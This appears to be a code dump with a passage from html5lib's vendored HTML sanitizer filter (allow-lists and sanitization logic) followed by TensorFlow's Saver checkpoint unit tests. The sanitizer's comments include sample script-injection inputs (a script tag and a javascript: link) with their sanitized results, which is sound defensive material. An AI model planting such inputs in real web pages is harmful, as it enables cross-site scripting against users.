'usemap'), (None, 'urn'), (None, 'valign'), (None, 'value'), (None, 'variable'), (None, 'volume'), (None, 'vspace'), (None, 'vrml'), (None, 'width'), (None, 'wrap'), (namespaces['xml'], 'lang'), # MathML attributes (None, 'actiontype'), (None, 'align'), (None, 'columnalign'), (None, 'columnalign'), (None, 'columnalign'), (None, 'columnlines'), (None, 'columnspacing'), (None, 'columnspan'), (None, 'depth'), (None, 'display'), (None, 'displaystyle'), (None, 'equalcolumns'), (None, 'equalrows'), (None, 'fence'), (None, 'fontstyle'), (None, 'fontweight'), (None, 'frame'), (None, 'height'), (None, 'linethickness'), (None, 'lspace'), (None, 'mathbackground'), (None, 'mathcolor'), (None, 'mathvariant'), (None, 'mathvariant'), (None, 'maxsize'), (None, 'minsize'), (None, 'other'), (None, 'rowalign'), (None, 'rowalign'), (None, 'rowalign'), (None, 'rowlines'), (None, 'rowspacing'), (None, 'rowspan'), (None, 'rspace'), (None, 'scriptlevel'), (None, 'selection'), (None, 'separator'), (None, 'stretchy'), (None, 'width'), (None, 'width'), (namespaces['xlink'], 'href'), (namespaces['xlink'], 'show'), (namespaces['xlink'], 'type'), # SVG attributes (None, 'accent-height'), (None, 'accumulate'), (None, 'additive'), (None, 'alphabetic'), (None, 'arabic-form'), (None, 'ascent'), (None, 'attributeName'), (None, 'attributeType'), (None, 'baseProfile'), (None, 'bbox'), (None, 'begin'), (None, 'by'), (None, 'calcMode'), (None, 'cap-height'), (None, 'class'), (None, 'clip-path'), (None, 'color'), (None, 'color-rendering'), (None, 'content'), (None, 'cx'), (None, 'cy'), (None, 'd'), (None, 'dx'), (None, 'dy'), (None, 'descent'), (None, 'display'), (None, 'dur'), (None, 'end'), (None, 'fill'), (None, 'fill-opacity'), (None, 'fill-rule'), (None, 'font-family'), (None, 'font-size'), (None, 'font-stretch'), (None, 'font-style'), (None, 'font-variant'), (None, 'font-weight'), (None, 'from'), (None, 'fx'), (None, 'fy'), (None, 'g1'), (None, 'g2'), (None, 'glyph-name'), (None, 'gradientUnits'), (None, 'hanging'), (None, 'height'), (None, 'horiz-adv-x'), (None, 'horiz-origin-x'), (None, 'id'), (None, 'ideographic'), (None, 'k'), (None, 'keyPoints'), (None, 'keySplines'), (None, 'keyTimes'), (None, 'lang'), (None, 'marker-end'), (None, 'marker-mid'), (None, 'marker-start'), (None, 'markerHeight'), (None, 'markerUnits'), (None, 'markerWidth'), (None, 'mathematical'), (None, 'max'), (None, 'min'), (None, 'name'), (None, 'offset'), (None, 'opacity'), (None, 'orient'), (None, 'origin'), (None, 'overline-position'), (None, 'overline-thickness'), (None, 'panose-1'), (None, 'path'), (None, 'pathLength'), (None, 'points'), (None, 'preserveAspectRatio'), (None, 'r'), (None, 'refX'), (None, 'refY'), (None, 'repeatCount'), (None, 'repeatDur'), (None, 'requiredExtensions'), (None, 'requiredFeatures'), (None, 'restart'), (None, 'rotate'), (None, 'rx'), (None, 'ry'), (None, 'slope'), (None, 'stemh'), (None, 'stemv'), (None, 'stop-color'), (None, 'stop-opacity'), (None, 'strikethrough-position'), (None, 'strikethrough-thickness'), (None, 'stroke'), (None, 'stroke-dasharray'), (None, 'stroke-dashoffset'), (None, 'stroke-linecap'), (None, 'stroke-linejoin'), (None, 'stroke-miterlimit'), (None, 'stroke-opacity'), (None, 'stroke-width'), (None, 'systemLanguage'), (None, 'target'), (None, 'text-anchor'), (None, 'to'), (None, 'transform'), (None, 'type'), (None, 'u1'), (None, 'u2'), (None, 'underline-position'), (None, 'underline-thickness'), (None, 'unicode'), (None, 'unicode-range'), (None, 'units-per-em'), (None, 'values'), (None, 'version'), (None, 'viewBox'), (None, 'visibility'), (None, 'width'), (None, 'widths'), (None, 'x'), (None, 'x-height'), (None, 'x1'), (None, 'x2'), (namespaces['xlink'], 'actuate'), (namespaces['xlink'], 'arcrole'), (namespaces['xlink'], 'href'), (namespaces['xlink'], 'role'), (namespaces['xlink'], 'show'), (namespaces['xlink'], 'title'), (namespaces['xlink'], 'type'), (namespaces['xml'], 'base'), (namespaces['xml'], 'lang'), (namespaces['xml'], 'space'), (None, 'y'), (None, 'y1'), (None, 'y2'), (None, 'zoomAndPan'), )) attr_val_is_uri = frozenset(( (None, 'href'), (None, 'src'), (None, 'cite'), (None, 'action'), (None, 'longdesc'), (None, 'poster'), (None, 'background'), (None, 'datasrc'), (None, 'dynsrc'), (None, 'lowsrc'), (None, 'ping'), (namespaces['xlink'], 'href'), (namespaces['xml'], 'base'), )) svg_attr_val_allows_ref = frozenset(( (None, 'clip-path'), (None, 'color-profile'), (None, 'cursor'), (None, 'fill'), (None, 'filter'), (None, 'marker'), (None, 'marker-start'), (None, 'marker-mid'), (None, 'marker-end'), (None, 'mask'), (None, 'stroke'), )) svg_allow_local_href = frozenset(( (None, 'altGlyph'), (None, 'animate'), (None, 'animateColor'), (None, 'animateMotion'), (None, 'animateTransform'), (None, 'cursor'), (None, 'feImage'), (None, 'filter'), (None, 'linearGradient'), (None, 'pattern'), (None, 'radialGradient'), (None, 'textpath'), (None, 'tref'), (None, 'set'), (None, 'use') )) allowed_css_properties = frozenset(( 'azimuth', 'background-color', 'border-bottom-color', 'border-collapse', 'border-color', 'border-left-color', 'border-right-color', 'border-top-color', 'clear', 'color', 'cursor', 'direction', 'display', 'elevation', 'float', 'font', 'font-family', 'font-size', 'font-style', 'font-variant', 'font-weight', 'height', 'letter-spacing', 'line-height', 'overflow', 'pause', 'pause-after', 'pause-before', 'pitch', 'pitch-range', 'richness', 'speak', 'speak-header', 'speak-numeral', 'speak-punctuation', 'speech-rate', 'stress', 'text-align', 'text-decoration', 'text-indent', 'unicode-bidi', 'vertical-align', 'voice-family', 'volume', 'white-space', 'width', )) allowed_css_keywords = frozenset(( 'auto', 'aqua', 'black', 'block', 'blue', 'bold', 'both', 'bottom', 'brown', 'center', 'collapse', 'dashed', 'dotted', 'fuchsia', 'gray', 'green', '!important', 'italic', 'left', 'lime', 'maroon', 'medium', 'none', 'navy', 'normal', 'nowrap', 'olive', 'pointer', 'purple', 'red', 'right', 'solid', 'silver', 'teal', 'top', 'transparent', 'underline', 'white', 'yellow', )) allowed_svg_properties = frozenset(( 'fill', 'fill-opacity', 'fill-rule', 'stroke', 'stroke-width', 'stroke-linecap', 'stroke-linejoin', 'stroke-opacity', )) allowed_protocols = frozenset(( 'ed2k', 'ftp', 'http', 'https', 'irc', 'mailto', 'news', 'gopher', 'nntp', 'telnet', 'webcal', 'xmpp', 'callto', 'feed', 'urn', 'aim', 'rsync', 'tag', 'ssh', 'sftp', 'rtsp', 'afs', 'data', )) allowed_content_types = frozenset(( 'image/png', 'image/jpeg', 'image/gif', 'image/webp', 'image/bmp', 'text/plain', )) data_content_type = re.compile(r''' ^ # Match a content type <application>/<type> (?P<content_type>[-a-zA-Z0-9.]+/[-a-zA-Z0-9.]+) # Match any character set and encoding (?:(?:;charset=(?:[-a-zA-Z0-9]+)(?:;(?:base64))?) |(?:;(?:base64))?(?:;charset=(?:[-a-zA-Z0-9]+))?) # Assume the rest is data ,.* $ ''', re.VERBOSE) class Filter(base.Filter): """ sanitization of XHTML+MathML+SVG and of inline style attributes.""" def __init__(self, source, allowed_elements=allowed_elements, allowed_attributes=allowed_attributes, allowed_css_properties=allowed_css_properties, allowed_css_keywords=allowed_css_keywords, allowed_svg_properties=allowed_svg_properties, allowed_protocols=allowed_protocols, allowed_content_types=allowed_content_types, attr_val_is_uri=attr_val_is_uri, svg_attr_val_allows_ref=svg_attr_val_allows_ref, svg_allow_local_href=svg_allow_local_href): super(Filter, self).__init__(source) self.allowed_elements = allowed_elements self.allowed_attributes = allowed_attributes self.allowed_css_properties = allowed_css_properties self.allowed_css_keywords = allowed_css_keywords self.allowed_svg_properties = allowed_svg_properties self.allowed_protocols = allowed_protocols self.allowed_content_types = allowed_content_types self.attr_val_is_uri = attr_val_is_uri self.svg_attr_val_allows_ref = svg_attr_val_allows_ref self.svg_allow_local_href = svg_allow_local_href def __iter__(self): for token in base.Filter.__iter__(self): token = self.sanitize_token(token) if token: yield token # Sanitize the +html+, escaping all elements not in ALLOWED_ELEMENTS, and # stripping out all # attributes not in ALLOWED_ATTRIBUTES. Style # attributes are parsed, and a restricted set, # specified by # ALLOWED_CSS_PROPERTIES and ALLOWED_CSS_KEYWORDS, are allowed through. # attributes in ATTR_VAL_IS_URI are scanned, and only URI schemes specified # in ALLOWED_PROTOCOLS are allowed. # # sanitize_html('<script> do_nasty_stuff() </script>') # => &lt;script> do_nasty_stuff() &lt;/script> # sanitize_html('<a href="javascript: sucker();">Click here for $100</a>') # => <a>Click here for $100</a> def sanitize_token(self, token): # accommodate filters which use token_type differently token_type = token["type"] if token_type in ("StartTag", "EndTag", "EmptyTag"): name = token["name"] namespace = token["namespace"] if ((namespace, name) in self.allowed_elements or (namespace is None and (namespaces["html"], name) in self.allowed_elements)): return self.allowed_token(token) else: return self.disallowed_token(token) elif token_type == "Comment": pass else: return token def allowed_token(self, token): if "data" in token: attrs = token["data"] attr_names = set(attrs.keys()) # Remove forbidden attributes for to_remove in (attr_names - self.allowed_attributes): del token["data"][to_remove] attr_names.remove(to_remove) # Remove attributes with disallowed URL values for attr in (attr_names & self.attr_val_is_uri): assert attr in attrs # I don't have a clue where this regexp comes from or why it matches those # characters, nor why we call unescape. I just know it's always been here. # Should you be worried by this comment in a sanitizer? Yes. On the other hand, all # this will do is remove *more* than it otherwise would. val_unescaped = re.sub("[`\x00-\x20\x7f-\xa0\s]+", '', unescape(attrs[attr])).lower() # remove replacement characters from unescaped characters val_unescaped = val_unescaped.replace("\ufffd", "") try: uri = urlparse.urlparse(val_unescaped) except ValueError: uri = None del attrs[attr] if uri and uri.scheme: if uri.scheme not in self.allowed_protocols: del attrs[attr] if uri.scheme == 'data': m = data_content_type.match(uri.path) if not m: del attrs[attr] elif m.group('content_type') not in self.allowed_content_types: del attrs[attr] for attr in self.svg_attr_val_allows_ref: if attr in attrs: attrs[attr] = re.sub(r'url\s*\(\s*[^#\s][^)]+?\)', ' ', unescape(attrs[attr])) if (token["name"] in self.svg_allow_local_href and (namespaces['xlink'], 'href') in attrs and re.search('^\s*[^#\s].*', attrs[(namespaces['xlink'], 'href')])): del attrs[(namespaces['xlink'], 'href')] if (None, 'style') in attrs: attrs[(None, 'style')] = self.sanitize_css(attrs[(None, 'style')]) token["data"] = attrs return token def disallowed_token(self, token): token_type = token["type"] if token_type == "EndTag": token["data"] = "</%s>" % token["name"] elif token["data"]: assert token_type in ("StartTag", "EmptyTag") attrs = [] for (ns, name), v in token["data"].items(): attrs.append(' %s="%s"' % (name if ns is None else "%s:%s" % (prefixes[ns], name), escape(v))) token["data"] = "<%s%s>" % (token["name"], ''.join(attrs)) else: token["data"] = "<%s>" % token["name"] if token.get("selfClosing"): token["data"] = token["data"][:-1] + "/>" token["type"] = "Characters" del token["name"] return token def sanitize_css(self, style): # disallow urls style = re.compile('url\s*\(\s*[^\s)]+?\s*\)\s*').sub(' ', style) # gauntlet if not re.match("""^([:,;#%.\sa-zA-Z0-9!]|\w-\w|'[\s\w]+'|"[\s\w]+"|\([\d,\s]+\))*$""", style): return '' if not re.match("^\s*([-\w]+\s*:[^:;]*(;\s*|$))*$", style): return '' clean = [] for prop, value in re.findall("([-\w]+)\s*:\s*([^:;]*)", style): if not value: continue if prop.lower() in self.allowed_css_properties: clean.append(prop + ': ' + value + ';') elif prop.split('-')[0].lower() in ['background', 'border', 'margin', 'padding']: for keyword in value.split(): if keyword not in self.allowed_css_keywords and \ not re.match("^(#[0-9a-f]+|rgb\(\d+%?,\d*%?,?\d*%?\)?|\d{0,2}\.?\d{0,2}(cm|em|ex|in|mm|pc|pt|px|%|,|\))?)$", keyword): # noqa break else: clean.append(prop + ': ' + value + ';') elif prop.lower() in self.allowed_svg_properties: clean.append(prop + ': ' + value + ';') return ' '.join(clean)
tstieven/amiunique
website/venv/lib/python2.7/site-packages/pip/_vendor/html5lib/filters/sanitizer.py
Python
mit
25,114
"""Tests for tensorflow.ops.io_ops.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os.path import time import tensorflow.python.platform import tensorflow as tf import numpy as np from tensorflow.python.platform import gfile class SaverTest(tf.test.TestCase): def testBasics(self): save_path = os.path.join(self.get_temp_dir(), "basics") with self.test_session() as sess: # Build a graph with 2 parameter nodes, and Save and # Restore nodes for them. v0 = tf.Variable(10.0, name="v0") v1 = tf.Variable(20.0, name="v1") save = tf.train.Saver({"v0": v0, "v1": v1}, restore_sequentially=True) tf.initialize_all_variables().run() # Check that the parameter nodes have been initialized. self.assertEqual(10.0, v0.eval()) self.assertEqual(20.0, v1.eval()) # Save the initialized values in the file at "save_path" val = save.save(sess, save_path) self.assertTrue(isinstance(val, basestring)) self.assertEqual(save_path, val) # Start a second session. In that session the parameter nodes # have not been initialized either. with self.test_session() as sess: v0 = tf.Variable(-1.0, name="v0") v1 = tf.Variable(-1.0, name="v1") save = tf.train.Saver({"v0": v0, "v1": v1}) with self.assertRaisesWithPredicateMatch( tf.OpError, lambda e: "uninitialized value v0" in e.message): sess.run(v0) with self.assertRaisesWithPredicateMatch( tf.OpError, lambda e: "uninitialized value v1" in e.message): sess.run(v1) # Restore the saved values in the parameter nodes. save.restore(sess, save_path) # Check that the parameter nodes have been restored. self.assertEqual(10.0, v0.eval()) self.assertEqual(20.0, v1.eval()) # Build another graph with 2 nodes, initialized # differently, and a Restore node for them. with self.test_session() as sess: v0_2 = tf.Variable(1000.0, name="v0") v1_2 = tf.Variable(2000.0, name="v1") save2 = tf.train.Saver({"v0": v0_2, "v1": v1_2}) tf.initialize_all_variables().run() # Check that the parameter nodes have been initialized. self.assertEqual(1000.0, v0_2.eval()) self.assertEqual(2000.0, v1_2.eval()) # Restore the values saved earlier in the parameter nodes. save2.restore(sess, save_path) # Check that the parameter nodes have been restored. self.assertEqual(10.0, v0_2.eval()) self.assertEqual(20.0, v1_2.eval()) def testInt64(self): save_path = os.path.join(self.get_temp_dir(), "int64") with self.test_session() as sess: # Build a graph with 1 node, and save and restore for them. v = tf.Variable(np.int64(15), name="v") save = tf.train.Saver({"v": v}, restore_sequentially=True) tf.initialize_all_variables().run() # Save the initialized values in the file at "save_path" val = save.save(sess, save_path) self.assertTrue(isinstance(val, basestring)) self.assertEqual(save_path, val) with self.test_session() as sess: v = tf.Variable(np.int64(-1), name="v") save = tf.train.Saver({"v": v}) with self.assertRaisesWithPredicateMatch( tf.OpError, lambda e: "uninitialized value v" in e.message): sess.run(v) # Restore the saved values in the parameter nodes. save.restore(sess, save_path) # Check that the parameter nodes have been restored. self.assertEqual(np.int64(15), v.eval()) def testSomeErrors(self): with tf.Graph().as_default(): v0 = tf.Variable([10.0], name="v0") v1 = tf.Variable([20.0], name="v1") v2 = tf.Variable([20.0], name="v2") v2._set_save_slice_info(tf.Variable.SaveSliceInfo("v1", "")) # By default the name used for "v2" will be "v1" and raise an error. with self.assertRaisesRegexp(ValueError, "same name: v1"): tf.train.Saver([v0, v1, v2]) # The names are different and will work. tf.train.Saver({"vee1": v1, "other": [v2]}) def testBasicsWithListOfVariables(self): save_path = os.path.join(self.get_temp_dir(), "basics_with_list") with self.test_session(graph=tf.Graph()) as sess: # Build a graph with 2 parameter nodes, and Save and # Restore nodes for them. v0 = tf.Variable(10.0, name="v0") v1 = tf.Variable(20.0, name="v1") save = tf.train.Saver([v0, v1]) tf.initialize_all_variables().run() # Check that the parameter nodes have been initialized. self.assertEqual(10.0, v0.eval()) self.assertEqual(20.0, v1.eval()) # Save the initialized values in the file at "save_path" val = save.save(sess, save_path) self.assertTrue(isinstance(val, basestring)) self.assertEqual(save_path, val) # Start a second session. In that session the variables # have not been initialized either. with self.test_session(graph=tf.Graph()) as sess: v0 = tf.Variable(-1.0, name="v0") v1 = tf.Variable(-1.0, name="v1") save = tf.train.Saver([v0, v1]) with self.assertRaisesWithPredicateMatch( tf.OpError, lambda e: "uninitialized value v0" in e.message): sess.run(v0) with self.assertRaisesWithPredicateMatch( tf.OpError, lambda e: "uninitialized value v1" in e.message): sess.run(v1) # Restore the saved values in the parameter nodes. save.restore(sess, save_path) # Check that the parameter nodes have been restored. self.assertEqual(10.0, v0.eval()) self.assertEqual(20.0, v1.eval()) # Build another graph with 2 nodes, initialized # differently, and a Restore node for them. with self.test_session(graph=tf.Graph()) as sess: v0_2 = tf.Variable(1000.0, name="v0") v1_2 = tf.Variable(2000.0, name="v1") save2 = tf.train.Saver([v0_2, v1_2]) tf.initialize_all_variables().run() # Check that the parameter nodes have been initialized. self.assertEqual(1000.0, v0_2.eval()) self.assertEqual(2000.0, v1_2.eval()) # Restore the values saved earlier in the parameter nodes. save2.restore(sess, save_path) # Check that the parameter nodes have been restored. self.assertEqual(10.0, v0_2.eval()) self.assertEqual(20.0, v1_2.eval()) def _SaveAndLoad(self, var_name, var_value, other_value, save_path): with self.test_session() as sess: var = tf.Variable(var_value, name=var_name) save = tf.train.Saver({var_name: var}) var.initializer.run() val = save.save(sess, save_path) self.assertEqual(save_path, val) with self.test_session() as sess: var = tf.Variable(other_value, name=var_name) save = tf.train.Saver({var_name: var}) save.restore(sess, save_path) self.assertAllClose(var_value, var.eval()) def testCacheRereadsFile(self): save_path = os.path.join(self.get_temp_dir(), "cache_rereads") # Save and reload one Variable named "var0". self._SaveAndLoad("var0", 0.0, 1.0, save_path) # Save and reload one Variable named "var1" in the same file. # The cached readers should know to re-read the file. self._SaveAndLoad("var1", 1.1, 2.2, save_path) def testGPU(self): if not tf.test.IsBuiltWithCuda(): return save_path = os.path.join(self.get_temp_dir(), "gpu") with tf.Session("", graph=tf.Graph()) as sess: with sess.graph.device("/gpu:0"): v0_1 = tf.Variable(123.45) save = tf.train.Saver({"v0": v0_1}) tf.initialize_all_variables().run() save.save(sess, save_path) with tf.Session("", graph=tf.Graph()) as sess: with sess.graph.device("/gpu:0"): v0_2 = tf.Variable(543.21) save = tf.train.Saver({"v0": v0_2}) tf.initialize_all_variables().run() self.assertAllClose(543.21, v0_2.eval()) save.restore(sess, save_path) self.assertAllClose(123.45, v0_2.eval()) def testVariables(self): save_path = os.path.join(self.get_temp_dir(), "variables") with tf.Session("", graph=tf.Graph()) as sess: one = tf.Variable(1.0) twos = tf.Variable([2.0, 2.0, 2.0]) init = tf.initialize_all_variables() save = tf.train.Saver(tf.all_variables()) init.run() save.save(sess, save_path) with tf.Session("", graph=tf.Graph()) as sess: one = tf.Variable(0.0) twos = tf.Variable([0.0, 0.0, 0.0]) # Saver with no arg, defaults to 'all variables'. save = tf.train.Saver() save.restore(sess, save_path) self.assertAllClose(1.0, one.eval()) self.assertAllClose([2.0, 2.0, 2.0], twos.eval()) def testSaveWithGlobalStep(self): save_path = os.path.join(self.get_temp_dir(), "ckpt_with_global_step") global_step_int = 5 # Save and reload one Variable named "var0". self._SaveAndLoad("var0", 0.0, 1.0, save_path) for use_tensor in [True, False]: with self.test_session() as sess: var = tf.Variable(1.0, name="var0") save = tf.train.Saver({var.op.name: var}) var.initializer.run() if use_tensor: global_step = tf.constant(global_step_int) val = save.save(sess, save_path, global_step=global_step) else: val = save.save(sess, save_path, global_step=global_step_int) expected_save_path = "%s-%d" % (save_path, global_step_int) self.assertEqual(expected_save_path, val) class SaveRestoreShardedTest(tf.test.TestCase): def testBasics(self): save_path = os.path.join(self.get_temp_dir(), "sharded") # Build a graph with 2 parameter nodes on different devices. with tf.Session( target="", config=tf.ConfigProto(device_count={"CPU": 2})) as sess: with sess.graph.device("/cpu:0"): v0 = tf.Variable(10, name="v0") with sess.graph.device("/cpu:1"): v1 = tf.Variable(20, name="v1") save = tf.train.Saver({"v0": v0, "v1": v1}, sharded=True) tf.initialize_all_variables().run() val = save.save(sess, save_path) self.assertEqual(save_path + "-?????-of-00002", val) # Restore a different "v0" from shard 0 of the saved files. with tf.Session( target="", config=tf.ConfigProto(device_count={"CPU": 2})) as sess: with sess.graph.device("/cpu:0"): v0 = tf.Variable(111, name="v0") save = tf.train.Saver({"v0": v0}, sharded=True) tf.initialize_all_variables().run() self.assertEqual(111, v0.eval()) save.restore(sess, save_path + "-00000-of-00002") self.assertEqual(10, v0.eval()) # Restore a different "v1" from shard 1 of the saved files. with tf.Session( target="", config=tf.ConfigProto(device_count={"CPU": 2})) as sess: with sess.graph.device("/cpu:0"): v1 = tf.Variable(222) save = tf.train.Saver({"v1": v1}, sharded=True) tf.initialize_all_variables().run() self.assertEqual(222, v1.eval()) save.restore(sess, save_path + "-00001-of-00002") self.assertEqual(20, v1.eval()) # Now try a restore with the sharded filename. with tf.Session( target="", config=tf.ConfigProto(device_count={"CPU": 2})) as sess: with sess.graph.device("/cpu:0"): v0 = tf.Variable(111, name="v0") with sess.graph.device("/cpu:1"): v1 = tf.Variable(222, name="v1") save = tf.train.Saver({"v0": v0, "v1": v1}, sharded=True) tf.initialize_all_variables().run() self.assertEqual(111, v0.eval()) self.assertEqual(222, v1.eval()) save_path = os.path.join(self.get_temp_dir(), "sharded") save.restore(sess, save_path + "-?????-of-?????") self.assertEqual(10, v0.eval()) self.assertEqual(20, v1.eval()) def testSaverDef(self): with self.test_session(): v0 = tf.Variable(123, name="v0") save = tf.train.Saver({"v0": v0}, sharded=True) sd = save.as_saver_def() self.assertTrue(sd.sharded) class MaxToKeepTest(tf.test.TestCase): def testNonSharded(self): save_dir = os.path.join(self.get_temp_dir(), "max_to_keep_non_sharded") try: gfile.DeleteRecursively(save_dir) except gfile.GOSError as _: pass # Ignore gfile.MakeDirs(save_dir) with self.test_session() as sess: v = tf.Variable(10.0, name="v") save = tf.train.Saver({"v": v}, max_to_keep=2) tf.initialize_all_variables().run() self.assertEqual([], save.last_checkpoints) s1 = save.save(sess, os.path.join(save_dir, "s1")) self.assertEqual([s1], save.last_checkpoints) self.assertTrue(gfile.Exists(s1)) s2 = save.save(sess, os.path.join(save_dir, "s2")) self.assertEqual([s1, s2], save.last_checkpoints) self.assertTrue(gfile.Exists(s1)) self.assertTrue(gfile.Exists(s2)) s3 = save.save(sess, os.path.join(save_dir, "s3")) self.assertEqual([s2, s3], save.last_checkpoints) self.assertFalse(gfile.Exists(s1)) self.assertTrue(gfile.Exists(s2)) self.assertTrue(gfile.Exists(s3)) # Create a second helper, identical to the first. save2 = tf.train.Saver(saver_def=save.as_saver_def()) save2.set_last_checkpoints(save.last_checkpoints) # Create a third helper, with the same configuration but no knowledge of # previous checkpoints. save3 = tf.train.Saver(saver_def=save.as_saver_def()) # Exercise the first helper. # Adding s2 again (old s2 is removed first, then new s2 appended) s2 = save.save(sess, os.path.join(save_dir, "s2")) self.assertEqual([s3, s2], save.last_checkpoints) self.assertFalse(gfile.Exists(s1)) self.assertTrue(gfile.Exists(s3)) self.assertTrue(gfile.Exists(s2)) # Adding s1 (s3 should now be deleted as oldest in list) s1 = save.save(sess, os.path.join(save_dir, "s1")) self.assertEqual([s2, s1], save.last_checkpoints) self.assertFalse(gfile.Exists(s3)) self.assertTrue(gfile.Exists(s2)) self.assertTrue(gfile.Exists(s1)) # Exercise the second helper. # Adding s2 again (old s2 is removed first, then new s2 appended) s2 = save2.save(sess, os.path.join(save_dir, "s2")) self.assertEqual([s3, s2], save2.last_checkpoints) # Created by the first helper. self.assertTrue(gfile.Exists(s1)) # Deleted by the first helper. self.assertFalse(gfile.Exists(s3)) self.assertTrue(gfile.Exists(s2)) # Adding s1 (s3 should now be deleted as oldest in list) s1 = save2.save(sess, os.path.join(save_dir, "s1")) self.assertEqual([s2, s1], save2.last_checkpoints) self.assertFalse(gfile.Exists(s3)) self.assertTrue(gfile.Exists(s2)) self.assertTrue(gfile.Exists(s1)) # Exercise the third helper. # Adding s2 again (but helper is unaware of previous s2) s2 = save3.save(sess, os.path.join(save_dir, "s2")) self.assertEqual([s2], save3.last_checkpoints) # Created by the first helper. self.assertTrue(gfile.Exists(s1)) # Deleted by the first helper. self.assertFalse(gfile.Exists(s3)) self.assertTrue(gfile.Exists(s2)) # Adding s1 (s3 should not be deleted because helper is unaware of it) s1 = save3.save(sess, os.path.join(save_dir, "s1")) self.assertEqual([s2, s1], save3.last_checkpoints) self.assertFalse(gfile.Exists(s3)) self.assertTrue(gfile.Exists(s2)) self.assertTrue(gfile.Exists(s1)) def testSharded(self): save_dir = os.path.join(self.get_temp_dir(), "max_to_keep_sharded") try: gfile.DeleteRecursively(save_dir) except gfile.GOSError as _: pass # Ignore gfile.MakeDirs(save_dir) with tf.Session( target="", config=tf.ConfigProto(device_count={"CPU": 2})) as sess: with sess.graph.device("/cpu:0"): v0 = tf.Variable(111, name="v0") with sess.graph.device("/cpu:1"): v1 = tf.Variable(222, name="v1") save = tf.train.Saver({"v0": v0, "v1": v1}, sharded=True, max_to_keep=2) tf.initialize_all_variables().run() self.assertEqual([], save.last_checkpoints) s1 = save.save(sess, os.path.join(save_dir, "s1")) self.assertEqual([s1], save.last_checkpoints) self.assertEquals(2, len(gfile.Glob(s1))) s2 = save.save(sess, os.path.join(save_dir, "s2")) self.assertEqual([s1, s2], save.last_checkpoints) self.assertEquals(2, len(gfile.Glob(s1))) self.assertEquals(2, len(gfile.Glob(s2))) s3 = save.save(sess, os.path.join(save_dir, "s3")) self.assertEqual([s2, s3], save.last_checkpoints) self.assertEquals(0, len(gfile.Glob(s1))) self.assertEquals(2, len(gfile.Glob(s2))) self.assertEquals(2, len(gfile.Glob(s3))) class KeepCheckpointEveryNHoursTest(tf.test.TestCase): def testNonSharded(self): save_dir = os.path.join(self.get_temp_dir(), "keep_checkpoint_every_n_hours") try: gfile.DeleteRecursively(save_dir) except gfile.GOSError as _: pass # Ignore gfile.MakeDirs(save_dir) with self.test_session() as sess: v = tf.Variable([10.0], name="v") # Run the initializer NOW to avoid the 0.5s overhead of the first Run() # call, which throws the test timing off in fastbuild mode. tf.initialize_all_variables().run() # Create a saver that will keep the last 2 checkpoints plus one every 0.7 # seconds. start_time = time.time() save = tf.train.Saver({"v": v}, max_to_keep=2, keep_checkpoint_every_n_hours=0.7 / 3600) self.assertEqual([], save.last_checkpoints) # Wait till 0.7 second have elapsed so s1 will be old enough to keep. time.sleep((time.time() + 0.7) - start_time) s1 = save.save(sess, os.path.join(save_dir, "s1")) self.assertEqual([s1], save.last_checkpoints) s2 = save.save(sess, os.path.join(save_dir, "s2")) self.assertEqual([s1, s2], save.last_checkpoints) # We now have 2 'last_checkpoints': [s1, s2]. The next call to Save(), # would normally delete s1, because max_to_keep is 2. However, s1 is # older than 0.7s so we must keep it. s3 = save.save(sess, os.path.join(save_dir, "s3")) self.assertEqual([s2, s3], save.last_checkpoints) # s1 should still be here, we are Not checking now to reduce time # variance in the test. # We now have 2 'last_checkpoints': [s2, s3], and s1 on disk. The next # call to Save(), will delete s2, because max_to_keep is 2, and because # we already kept the old s1. s2 is very close in time to s1 so it gets # deleted. s4 = save.save(sess, os.path.join(save_dir, "s4")) self.assertEqual([s3, s4], save.last_checkpoints) # Check that s1 is still here, but s2 is gone. self.assertTrue(gfile.Exists(s1)) self.assertFalse(gfile.Exists(s2)) self.assertTrue(gfile.Exists(s3)) self.assertTrue(gfile.Exists(s4)) class SaveRestoreWithVariableNameMap(tf.test.TestCase): def testNonReshape(self): save_path = os.path.join(self.get_temp_dir(), "basics") with self.test_session() as sess: # Build a graph with 2 parameter nodes, and Save and # Restore nodes for them. v0 = tf.Variable(10.0, name="v0") v1 = tf.Variable(20.0, name="v1") save = tf.train.Saver({"save_prefix/v0": v0, "save_prefix/v1": v1}) tf.initialize_all_variables().run() # Check that the parameter nodes have been initialized. self.assertEqual(10.0, v0.eval()) self.assertEqual(20.0, v1.eval()) # Save the initialized values in the file at "save_path" # Use a variable name map to set the saved tensor names val = save.save(sess, save_path) self.assertTrue(isinstance(val, basestring)) self.assertEqual(save_path, val) # Verify that the original names are not in the Saved file save = tf.train.Saver({"v0": v0, "v1": v1}) with self.assertRaisesOpError("not found in checkpoint"): save.restore(sess, save_path) # Verify that the mapped names are present in the Saved file and can be # Restored using remapped names. with self.test_session() as sess: v0 = tf.Variable(-1.0, name="v0") v1 = tf.Variable(-1.0, name="v1") with self.assertRaisesOpError("uninitialized value v0"): sess.run(v0) with self.assertRaisesOpError("uninitialized value v1"): sess.run(v1) save = tf.train.Saver({"save_prefix/v0": v0, "save_prefix/v1": v1}) save.restore(sess, save_path) # Check that the parameter nodes have been restored. self.assertEqual(10.0, v0.eval()) self.assertEqual(20.0, v1.eval()) # Add a prefix to the node names in the current graph and Restore using # remapped names. with self.test_session() as sess: v0 = tf.Variable(-1.0, name="restore_prefix/v0") v1 = tf.Variable(-1.0, name="restore_prefix/v1") with self.assertRaisesOpError("uninitialized value restore_prefix/v0"): sess.run(v0) with self.assertRaisesOpError("uninitialized value restore_prefix/v1"): sess.run(v1) # Restore the saved values in the parameter nodes. save = tf.train.Saver({"save_prefix/v0": v0, "save_prefix/v1": v1}) save.restore(sess, save_path) # Check that the parameter nodes have been restored. self.assertEqual(10.0, v0.eval()) self.assertEqual(20.0, v1.eval()) if __name__ == "__main__": tf.test.main()
brodyh/tensorflow
tensorflow/python/training/saver_test.py
Python
apache-2.0
21,676
